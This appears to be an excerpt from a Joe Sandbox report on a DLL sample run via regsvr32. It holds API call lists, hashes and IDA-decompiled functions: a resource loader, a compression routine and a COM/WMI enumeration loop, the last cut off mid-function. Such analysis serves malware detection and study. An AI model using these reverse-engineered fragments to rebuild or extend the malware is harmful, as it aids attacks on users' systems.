                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: FileFind$FirstNext
                  • String ID:
                  • API String ID: 1690352074-0
                  • Opcode ID: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
                  • Instruction ID: 241d9436e866cb8d74d7214ef8056216292051dc3c91cda8f0119f884e331b15
                  • Opcode Fuzzy Hash: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
                  • Instruction Fuzzy Hash: 8E31A47190021A6EFB10DBE4CC89FAA33B9EB047D0F110165F509AA1D5E771EEC4CB65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000744), ref: 1002966B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 10029672
                  Memory Dump Source
                  • Source File: 00000005.00000002.497767833.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10021000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID:
                  • API String ID: 1357844191-0
                  • Opcode ID: f0b32d386485ec8b2252e74fa392f6863baef6b9d97772d80ece6e57939d808c
                  • Instruction ID: f2d45d7e56076847abda7dacf9d916d46c2c24713d6d1dcbf256efb98a2a20cf
                  • Opcode Fuzzy Hash: f0b32d386485ec8b2252e74fa392f6863baef6b9d97772d80ece6e57939d808c
                  • Instruction Fuzzy Hash: C8318175A002A08BE7388F39CDEC5A97BF1FBC4316715436AD485A72A5D2BA5881CB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID:
                  • API String ID: 1518329722-0
                  • Opcode ID: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
                  • Instruction ID: efe317659bb93fd964c7109caf3faa3499ed084e9357a5ece8a85f8370063b94
                  • Opcode Fuzzy Hash: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
                  • Instruction Fuzzy Hash: BDE0DF7A8003186FD750EF788D46F9ABBFDEB80A00F018554AC85B3308E670EF048790
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E1000A51A(struct HINSTANCE__* __ecx, CHAR* __edx, void* __fp0, intOrPtr* _a4) {
                  				CHAR* _v8;
                  				struct HRSRC__* _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _t15;
                  				signed int _t17;
                  				struct HRSRC__* _t20;
                  				intOrPtr _t21;
                  				intOrPtr _t22;
                  				intOrPtr* _t23;
                  				intOrPtr* _t26;
                  				struct HINSTANCE__* _t28;
                  				intOrPtr _t30;
                  				intOrPtr* _t33;
                  				signed int _t35;
                  				intOrPtr _t37;
                  				void* _t38;
                  				void* _t39;
                  				void* _t43;
                  
                  				_t43 = __fp0;
                  				_t29 = __ecx;
                  				_v8 = __edx;
                  				_t28 = __ecx;
                  				_v20 = 0xa;
                  				_t35 = 0;
                  				_v16 = 3;
                  				while(1) {
                  					_t15 =  *0x1001e688; // 0x2bb0590
                  					_t17 = E1001242D(_t29, 0, _t43, _t15 + 0x648, 0x1e, 0x32);
                  					_t29 =  *0x1001e688; // 0x2bb0590
                  					_t39 = _t39 + 0xc;
                  					_t4 = _t29 + 0x644; // 0x0
                  					_t20 = FindResourceA(_t28, _v8, _t17 *  *_t4 +  *((intOrPtr*)(_t38 + _t35 * 4 - 0x10)));
                  					_v12 = _t20;
                  					if(_t20 != 0) {
                  						break;
                  					}
                  					_t35 = _t35 + 1;
                  					if(_t35 < 2) {
                  						continue;
                  					}
                  					L5:
                  					return 0;
                  				}
                  				_t21 =  *0x1001e684; // 0x2c2faa0
                  				_t22 =  *((intOrPtr*)(_t21 + 0x98))(_t28, _t20);
                  				_t30 =  *0x1001e684; // 0x2c2faa0
                  				_t37 = _t22;
                  				_t23 =  *((intOrPtr*)(_t30 + 0x9c))(_t28, _v12);
                  				__eflags = _t23;
                  				if(_t23 != 0) {
                  					_t33 = E10008669(_t23, _t37);
                  					__eflags = _t33;
                  					if(_t33 == 0) {
                  						goto L5;
                  					}
                  					_t26 = _a4;
                  					__eflags = _t26;
                  					if(_t26 != 0) {
                  						 *_t26 = _t37;
                  					}
                  					return _t33;
                  				}
                  				goto L5;
                  			}

                  APIs
                    • Part of subcall function 1001242D: _ftol2_sse.MSVCRT ref: 1001248E
                  • FindResourceA.KERNEL32(10000000,?,0000000A), ref: 1000A56B
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: FindResource_ftol2_sse
                  • String ID:
                  • API String ID: 726351646-0
                  • Opcode ID: fa11afd7f41ea2378334fb299b75509f8c3df56b18904dd99f39985f38db9f94
                  • Instruction ID: 3c93fbf5725d9a1cffb7147d36ac05838d176544f789f1d2bd1208ee8d1f8f1b
                  • Opcode Fuzzy Hash: fa11afd7f41ea2378334fb299b75509f8c3df56b18904dd99f39985f38db9f94
                  • Instruction Fuzzy Hash: 3D119D71B00305AFFB04CB69EC85E5E7BE9FB55395F014168F909D7252EA71DD408B50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 99%
                  			E10016EB0(intOrPtr _a4, signed int _a8, signed int _a12) {
                  				signed int _v8;
                  				signed short* _v12;
                  				char _v16;
                  				signed short _v20;
                  				unsigned int _v24;
                  				signed short _v28;
                  				signed int _t223;
                  				signed int _t235;
                  				signed int _t237;
                  				signed short _t240;
                  				signed int _t241;
                  				signed short _t244;
                  				signed int _t245;
                  				signed short _t248;
                  				signed int _t249;
                  				signed int _t250;
                  				void* _t254;
                  				signed char _t259;
                  				signed int _t275;
                  				signed int _t289;
                  				signed int _t308;
                  				signed short _t316;
                  				signed int _t321;
                  				void* _t329;
                  				signed short _t330;
                  				signed short _t333;
                  				signed short _t334;
                  				signed short _t343;
                  				signed short _t346;
                  				signed short _t347;
                  				signed short _t348;
                  				signed short _t358;
                  				signed short _t361;
                  				signed short _t362;
                  				signed short _t363;
                  				signed short _t370;
                  				signed int _t373;
                  				signed int _t378;
                  				signed short _t379;
                  				signed short _t382;
                  				unsigned int _t388;
                  				unsigned short _t390;
                  				unsigned short _t392;
                  				unsigned short _t394;
                  				signed int _t396;
                  				signed int _t397;
                  				signed int _t398;
                  				signed int _t400;
                  				signed short _t401;
                  				signed int _t402;
                  				signed int _t403;
                  				signed int _t407;
                  				signed int _t409;
                  
                  				_t223 = _a8;
                  				_t235 =  *(_t223 + 2) & 0x0000ffff;
                  				_push(_t397);
                  				_t388 = 0;
                  				_t398 = _t397 | 0xffffffff;
                  				if(_a12 < 0) {
                  					L42:
                  					return _t223;
                  				} else {
                  					_t329 =  !=  ? 7 : 0x8a;
                  					_v12 = _t223 + 6;
                  					_t254 = (0 | _t235 != 0x00000000) + 3;
                  					_v16 = _a12 + 1;
                  					do {
                  						_v24 = _t388;
                  						_t388 = _t388 + 1;
                  						_a8 = _t235;
                  						_a12 = _t235;
                  						_v8 =  *_v12 & 0x0000ffff;
                  						_t223 = _a4;
                  						if(_t388 >= _t329) {
                  							L4:
                  							if(_t388 >= _t254) {
                  								if(_a8 == 0) {
                  									_t122 = _t223 + 0x16bc; // 0x8b3c7e89
                  									_t400 =  *_t122;
                  									if(_t388 > 0xa) {
                  										_t168 = _t223 + 0xac4; // 0x5dc03300
                  										_t330 =  *_t168 & 0x0000ffff;
                  										_t169 = _t223 + 0xac6; // 0x55c35dc0
                  										_t237 =  *_t169 & 0x0000ffff;
                  										_v24 = _t330;
                  										_t171 = _t223 + 0x16b8; // 0xfffffe8b
                  										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
                  										_v28 = _t333;
                  										if(_t400 <= 0x10 - _t237) {
                  											_t259 = _t400 + _t237;
                  										} else {
                  											_t173 = _t223 + 0x14; // 0xc703f045
                  											 *(_t223 + 0x16b8) = _t333;
                  											_t175 = _t223 + 8; // 0x8d000040
                  											 *((char*)( *_t175 +  *_t173)) = _v28;
                  											_t223 = _a4;
                  											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                  											_t181 = _t223 + 0x14; // 0xc703f045
                  											_t182 = _t223 + 8; // 0x8d000040
                  											_t183 = _t223 + 0x16b9; // 0x89fffffe
                  											 *((char*)( *_t181 +  *_t182)) =  *_t183;
                  											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                  											_t333 = _v24 >> 0x10;
                  											_t189 = _t223 + 0x16bc; // 0x8b3c7e89
                  											_t259 =  *_t189 + 0xfffffff0 + _t237;
                  										}
                  										_t334 = _t333 & 0x0000ffff;
                  										 *(_t223 + 0x16bc) = _t259;
                  										 *(_t223 + 0x16b8) = _t334;
                  										_t401 = _t334 & 0x0000ffff;
                  										if(_t259 <= 9) {
                  											_t209 = _t388 - 0xb; // -10
                  											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
                  											 *(_t223 + 0x16bc) = _t259 + 7;
                  										} else {
                  											_t193 = _t223 + 8; // 0x8d000040
                  											_t390 = _t388 + 0xfffffff5;
                  											_t194 = _t223 + 0x14; // 0xc703f045
                  											_t240 = _t390 << _t259 | _t401;
                  											 *(_t223 + 0x16b8) = _t240;
                  											 *( *_t193 +  *_t194) = _t240;
                  											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                  											_t199 = _t223 + 0x14; // 0xc703f045
                  											_t200 = _t223 + 8; // 0x8d000040
                  											_t201 = _t223 + 0x16b9; // 0x89fffffe
                  											 *((char*)( *_t199 +  *_t200)) =  *_t201;
                  											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                  											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
                  											 *(_t223 + 0x16b8) = _t390 >> 0x10;
                  										}
                  										goto L35;
                  									}
                  									_t123 = _t223 + 0xac0; // 0x4e9
                  									_t343 =  *_t123 & 0x0000ffff;
                  									_t124 = _t223 + 0xac2; // 0x33000000
                  									_t241 =  *_t124 & 0x0000ffff;
                  									_v24 = _t343;
                  									_t126 = _t223 + 0x16b8; // 0xfffffe8b
                  									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
                  									_v28 = _t346;
                  									if(_t400 > 0x10 - _t241) {
                  										_t128 = _t223 + 0x14; // 0xc703f045
                  										 *(_t223 + 0x16b8) = _t346;
                  										_t130 = _t223 + 8; // 0x8d000040
                  										 *((char*)( *_t130 +  *_t128)) = _v28;
                  										_t223 = _a4;
                  										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                  										_t136 = _t223 + 0x14; // 0xc703f045
                  										_t137 = _t223 + 8; // 0x8d000040
                  										_t138 = _t223 + 0x16b9; // 0x89fffffe
                  										 *((char*)( *_t136 +  *_t137)) =  *_t138;
                  										_t142 = _t223 + 0x16bc; // 0x8b3c7e89
                  										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                  										_t346 = _v24 >> 0x10;
                  										_t400 =  *_t142 + 0xfffffff0;
                  									}
                  									_t403 = _t400 + _t241;
                  									_t347 = _t346 & 0x0000ffff;
                  									 *(_t223 + 0x16bc) = _t403;
                  									 *(_t223 + 0x16b8) = _t347;
                  									_t348 = _t347 & 0x0000ffff;
                  									if(_t403 <= 0xd) {
                  										_t163 = _t403 + 3; // 0x8b3c7e8c
                  										_t275 = _t163;
                  										L28:
                  										 *(_t223 + 0x16bc) = _t275;
                  										_t165 = _t388 - 3; // -2
                  										_t166 = _t223 + 0x16b8; // 0xfffffe8b
                  										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
                  									} else {
                  										_t392 = _t388 + 0xfffffffd;
                  										_t147 = _t223 + 0x14; // 0xc703f045
                  										_t244 = _t392 << _t403 | _t348;
                  										_t148 = _t223 + 8; // 0x8d000040
                  										 *(_t223 + 0x16b8) = _t244;
                  										 *( *_t148 +  *_t147) = _t244;
                  										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                  										_t153 = _t223 + 0x14; // 0xc703f045
                  										_t154 = _t223 + 8; // 0x8d000040
                  										_t155 = _t223 + 0x16b9; // 0x89fffffe
                  										 *((char*)( *_t153 +  *_t154)) =  *_t155;
                  										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                  										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
                  										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
                  									}
                  									goto L35;
                  								}
                  								_t289 = _a12;
                  								if(_t289 != _t398) {
                  									_t53 = _t289 * 4; // 0x238830a
                  									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
                  									_t56 = _t235 * 4; // 0x830a74c0
                  									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
                  									_t58 = _t223 + 0x16bc; // 0x8b3c7e89
                  									_t407 =  *_t58;
                  									_v28 = _t370;
                  									_t60 = _t223 + 0x16b8; // 0xfffffe8b
                  									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
                  									if(_t407 <= 0x10 - _t396) {
                  										_t373 = _t249;
                  										_t308 = _t407 + _t396;
                  									} else {
                  										_t61 = _t223 + 0x14; // 0xc703f045
                  										_t62 = _t223 + 8; // 0x8d000040
                  										 *(_t223 + 0x16b8) = _t249;
                  										 *( *_t62 +  *_t61) = _t249;
                  										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                  										_t67 = _t223 + 0x14; // 0xc703f045
                  										_t68 = _t223 + 8; // 0x8d000040
                  										_t69 = _t223 + 0x16b9; // 0x89fffffe
                  										 *((char*)( *_t67 +  *_t68)) =  *_t69;
                  										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                  										_t75 = _t223 + 0x16bc; // 0x8b3c7e89
                  										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
                  										_t308 =  *_t75 + 0xfffffff0 + _t396;
                  									}
                  									_t388 = _v24;
                  									 *(_t223 + 0x16bc) = _t308;
                  									 *(_t223 + 0x16b8) = _t373;
                  								}
                  								_t80 = _t223 + 0xabc; // 0x5d0674c0
                  								_t358 =  *_t80 & 0x0000ffff;
                  								_t81 = _t223 + 0x16bc; // 0x8b3c7e89
                  								_t402 =  *_t81;
                  								_t82 = _t223 + 0xabe; // 0x4e95d06
                  								_t245 =  *_t82 & 0x0000ffff;
                  								_v24 = _t358;
                  								_t84 = _t223 + 0x16b8; // 0xfffffe8b
                  								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
                  								_v28 = _t361;
                  								if(_t402 > 0x10 - _t245) {
                  									_t86 = _t223 + 0x14; // 0xc703f045
                  									 *(_t223 + 0x16b8) = _t361;
                  									_t88 = _t223 + 8; // 0x8d000040
                  									 *((char*)( *_t88 +  *_t86)) = _v28;
                  									_t223 = _a4;
                  									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                  									_t94 = _t223 + 0x14; // 0xc703f045
                  									_t95 = _t223 + 8; // 0x8d000040
                  									_t96 = _t223 + 0x16b9; // 0x89fffffe
                  									 *((char*)( *_t94 +  *_t95)) =  *_t96;
                  									_t100 = _t223 + 0x16bc; // 0x8b3c7e89
                  									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                  									_t361 = _v24 >> 0x10;
                  									_t402 =  *_t100 + 0xfffffff0;
                  								}
                  								_t403 = _t402 + _t245;
                  								_t362 = _t361 & 0x0000ffff;
                  								 *(_t223 + 0x16bc) = _t403;
                  								 *(_t223 + 0x16b8) = _t362;
                  								_t363 = _t362 & 0x0000ffff;
                  								if(_t403 <= 0xe) {
                  									_t121 = _t403 + 2; // 0x8b3c7e8b
                  									_t275 = _t121;
                  									goto L28;
                  								} else {
                  									_t394 = _t388 + 0xfffffffd;
                  									_t105 = _t223 + 0x14; // 0xc703f045
                  									_t248 = _t394 << _t403 | _t363;
                  									_t106 = _t223 + 8; // 0x8d000040
                  									 *(_t223 + 0x16b8) = _t248;
                  									 *( *_t106 +  *_t105) = _t248;
                  									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                  									_t111 = _t223 + 0x14; // 0xc703f045
                  									_t112 = _t223 + 8; // 0x8d000040
                  									_t113 = _t223 + 0x16b9; // 0x89fffffe
                  									 *((char*)( *_t111 +  *_t112)) =  *_t113;
                  									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                  									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
                  									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
                  									goto L35;
                  								}
                  							} else {
                  								_t316 = _t223 + (_t235 + 0x29f) * 4;
                  								_v28 = _t316;
                  								do {
                  									_t378 = _a12;
                  									_t22 = _t223 + 0x16bc; // 0x8b3c7e89
                  									_t409 =  *_t22;
                  									_t24 = _t378 * 4; // 0x238830a
                  									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
                  									_t379 =  *_t316 & 0x0000ffff;
                  									_v24 = _t379;
                  									_t27 = _t223 + 0x16b8; // 0xfffffe8b
                  									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
                  									_v20 = _t382;
                  									if(_t409 <= 0x10 - _t250) {
                  										_t321 = _t409 + _t250;
                  									} else {
                  										_t29 = _t223 + 0x14; // 0xc703f045
                  										 *(_t223 + 0x16b8) = _t382;
                  										_t31 = _t223 + 8; // 0x8d000040
                  										 *((char*)( *_t31 +  *_t29)) = _v20;
                  										_t223 = _a4;
                  										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                  										_t37 = _t223 + 0x14; // 0xc703f045
                  										_t38 = _t223 + 8; // 0x8d000040
                  										_t39 = _t223 + 0x16b9; // 0x89fffffe
                  										 *((char*)( *_t37 +  *_t38)) =  *_t39;
                  										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                  										_t382 = _v24 >> 0x10;
                  										_t45 = _t223 + 0x16bc; // 0x8b3c7e89
                  										_t321 =  *_t45 + 0xfffffff0 + _t250;
                  									}
                  									 *(_t223 + 0x16bc) = _t321;
                  									_t316 = _v28;
                  									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
                  									_t388 = _t388 - 1;
                  								} while (_t388 != 0);
                  								L35:
                  								_t235 = _v8;
                  								_t388 = 0;
                  								_t398 = _a12;
                  								if(_t235 != 0) {
                  									if(_a8 != _t235) {
                  										_t329 = 7;
                  										_t217 = _t329 - 3; // 0x4
                  										_t254 = _t217;
                  									} else {
                  										_t329 = 6;
                  										_t216 = _t329 - 3; // 0x3
                  										_t254 = _t216;
                  									}
                  								} else {
                  									_t329 = 0x8a;
                  									_t214 = _t388 + 3; // 0x3
                  									_t254 = _t214;
                  								}
                  								goto L41;
                  							}
                  						}
                  						_t223 = _a4;
                  						if(_t235 == _v8) {
                  							_t235 = _v8;
                  							goto L41;
                  						}
                  						goto L4;
                  						L41:
                  						_v12 =  &(_v12[2]);
                  						_t221 =  &_v16;
                  						 *_t221 = _v16 - 1;
                  					} while ( *_t221 != 0);
                  					goto L42;
                  				}
                  			}

                  C-Code - Quality: 50%
                  			E1000DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				char _v24;
                  				void* _v28;
                  				signed int _v32;
                  				char _v36;
                  				intOrPtr _v40;
                  				signed int _v44;
                  				char _v48;
                  				char _v52;
                  				intOrPtr _v56;
                  				signed int _v60;
                  				char* _v72;
                  				signed short _v80;
                  				signed int _v84;
                  				char _v88;
                  				char _v92;
                  				char _v96;
                  				intOrPtr _v100;
                  				char _v104;
                  				char _v616;
                  				intOrPtr* _t159;
                  				char _t165;
                  				signed int _t166;
                  				signed int _t173;
                  				signed int _t178;
                  				signed int _t186;
                  				intOrPtr* _t187;
                  				signed int _t188;
                  				signed int _t192;
                  				intOrPtr* _t193;
                  				intOrPtr _t200;
                  				intOrPtr* _t205;
                  				signed int _t207;
                  				signed int _t209;
                  				intOrPtr* _t210;
                  				intOrPtr _t212;
                  				intOrPtr* _t213;
                  				signed int _t214;
                  				char _t217;
                  				signed int _t218;
                  				signed int _t219;
                  				signed int _t230;
                  				signed int _t235;
                  				signed int _t242;
                  				signed int _t243;
                  				signed int _t244;
                  				signed int _t245;
                  				intOrPtr* _t247;
                  				intOrPtr* _t251;
                  				signed int _t252;
                  				intOrPtr* _t253;
                  				void* _t255;
                  				intOrPtr* _t261;
                  				signed int _t262;
                  				signed int _t283;
                  				signed int _t289;
                  				char* _t298;
                  				void* _t320;
                  				signed int _t322;
                  				intOrPtr* _t323;
                  				intOrPtr _t324;
                  				signed int _t327;
                  				intOrPtr* _t328;
                  				intOrPtr* _t329;
                  
                  				_v32 = _v32 & 0x00000000;
                  				_v60 = _v60 & 0x00000000;
                  				_v56 = __edx;
                  				_v100 = __ecx;
                  				_t159 = E1000D523(__ecx);
                  				_t251 = _t159;
                  				_v104 = _t251;
                  				if(_t251 == 0) {
                  					return _t159;
                  				}
                  				_t320 = E10008604(0x10);
                  				_v36 = _t320;
                  				_pop(_t255);
                  				if(_t320 == 0) {
                  					L53:
                  					E1000861A( &_v60, 0xfffffffe);
                  					E1000D5D7( &_v104);
                  					return _t320;
                  				}
                  				_t165 = E100095E1(_t255, 0x536);
                  				 *_t328 = 0x609;
                  				_v52 = _t165;
                  				_t166 = E100095E1(_t255);
                  				_push(0);
                  				_push(_v56);
                  				_v20 = _t166;
                  				_push(_t166);
                  				_push(_a4);
                  				_t322 = E100092E5(_t165);
                  				_v60 = _t322;
                  				E100085D5( &_v52);
                  				E100085D5( &_v20);
                  				_t329 = _t328 + 0x20;
                  				if(_t322 != 0) {
                  					_t323 = __imp__#2;
                  					_v40 =  *_t323(_t322);
                  					_t173 = E100095E1(_t255, 0x9e4);
                  					_v20 = _t173;
                  					_v52 =  *_t323(_t173);
                  					E100085D5( &_v20);
                  					_t324 = _v40;
                  					_t261 =  *_t251;
                  					_t252 = 0;
                  					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                  					__eflags = _t178;
                  					if(_t178 != 0) {
                  						L52:
                  						__imp__#6(_t324);
                  						__imp__#6(_v52);
                  						goto L53;
                  					}
                  					_t262 = _v32;
                  					_v28 = 0;
                  					_v20 = 0;
                  					__eflags = _t262;
                  					if(_t262 == 0) {
                  						L49:
                  						 *((intOrPtr*)( *_t262 + 8))(_t262);
                  						__eflags = _t252;
                  						if(_t252 == 0) {
                  							E1000861A( &_v36, 0);
                  							_t320 = _v36;
                  						} else {
                  							 *(_t320 + 8) = _t252;
                  							 *_t320 = E100091E3(_v100);
                  							 *((intOrPtr*)(_t320 + 4)) = E100091E3(_v56);
                  						}
                  						goto L52;
                  					} else {
                  						goto L6;
                  					}
                  					while(1) {
                  						L6:
                  						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                  						__eflags = _t186;
                  						if(_t186 != 0) {
                  							break;
                  						}
                  						_v16 = 0;
                  						_v48 = 0;
                  						_v12 = 0;
                  						_v24 = 0;
                  						__eflags = _v84;
                  						if(_v84 == 0) {
                  							break;
                  						}
                  						_t187 = _v28;
                  						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                  						__eflags = _t188;
                  						if(_t188 >= 0) {
                  							__imp__#20(_v24, 1,  &_v16);
                  							__imp__#19(_v24, 1,  &_v48);
                  							_t46 = _t320 + 0xc; // 0xc
                  							_t253 = _t46;
                  							_t327 = _t252 << 3;
                  							_t47 = _t327 + 8; // 0x8
                  							_t192 = E10008698(_t327, _t47);
                  							__eflags = _t192;
                  							if(_t192 == 0) {
                  								__imp__#16(_v24);
                  								_t193 = _v28;
                  								 *((intOrPtr*)( *_t193 + 8))(_t193);
                  								L46:
                  								_t252 = _v20;
                  								break;
                  							}
                  							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                  							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10008604( *(_t327 +  *_t253) << 3);
                  							_t200 =  *_t253;
                  							__eflags =  *(_t327 + _t200 + 4);
                  							if( *(_t327 + _t200 + 4) == 0) {
                  								_t136 = _t320 + 0xc; // 0xc
                  								E1000861A(_t136, 0);
                  								E1000861A( &_v36, 0);
                  								__imp__#16(_v24);
                  								_t205 = _v28;
                  								 *((intOrPtr*)( *_t205 + 8))(_t205);
                  								_t320 = _v36;
                  								goto L46;
                  							}
                  							_t207 = _v16;
                  							while(1) {
                  								_v12 = _t207;
                  								__eflags = _t207 - _v48;
                  								if(_t207 > _v48) {
                  									break;
                  								}
                  								_v44 = _v44 & 0x00000000;
                  								_t209 =  &_v12;
                  								__imp__#25(_v24, _t209,  &_v44);
                  								__eflags = _t209;
                  								if(_t209 < 0) {
                  									break;
                  								}
                  								_t212 = E100091E3(_v44);
                  								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                  								_t213 = _v28;
                  								_t281 =  *_t213;
                  								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                  								__eflags = _t214;
                  								if(_t214 < 0) {
                  									L39:
                  									__imp__#6(_v44);
                  									_t207 = _v12 + 1;
                  									__eflags = _t207;
                  									continue;
                  								}
                  								_v92 = E100095E1(_t281, 0x250);
                  								 *_t329 = 0x4cc;
                  								_t217 = E100095E1(_t281);
                  								_t283 = _v80;
                  								_v96 = _t217;
                  								_t218 = _t283 & 0x0000ffff;
                  								__eflags = _t218 - 0xb;
                  								if(__eflags > 0) {
                  									_t219 = _t218 - 0x10;
                  									__eflags = _t219;
                  									if(_t219 == 0) {
                  										L35:
                  										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
                  										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                  										__eflags = _t289;
                  										if(_t289 == 0) {
                  											L38:
                  											E100085D5( &_v92);
                  											E100085D5( &_v96);
                  											__imp__#9( &_v80);
                  											goto L39;
                  										}
                  										_push(_v72);
                  										_push(L"%d");
                  										L37:
                  										_push(0xc);
                  										_push(_t289);
                  										E10009640();
                  										_t329 = _t329 + 0x10;
                  										goto L38;
                  									}
                  									_t230 = _t219 - 1;
                  									__eflags = _t230;
                  									if(_t230 == 0) {
                  										L33:
                  										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
                  										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                  										__eflags = _t289;
                  										if(_t289 == 0) {
                  											goto L38;
                  										}
                  										_push(_v72);
                  										_push(L"%u");
                  										goto L37;
                  									}
                  									_t235 = _t230 - 1;
                  									__eflags = _t235;
                  									if(_t235 == 0) {
                  										goto L33;
                  									}
                  									__eflags = _t235 == 1;
                  									if(_t235 == 1) {
                  										goto L33;
                  									}
                  									L28:
                  									__eflags = _t283 & 0x00002000;
                  									if((_t283 & 0x00002000) == 0) {
                  										_v88 = E100095E1(_t283, 0x219);
                  										E10009640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                  										E100085D5( &_v88);
                  										_t329 = _t329 + 0x18;
                  										_t298 =  &_v616;
                  										L31:
                  										_t242 = E100091E3(_t298);
                  										L32:
                  										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
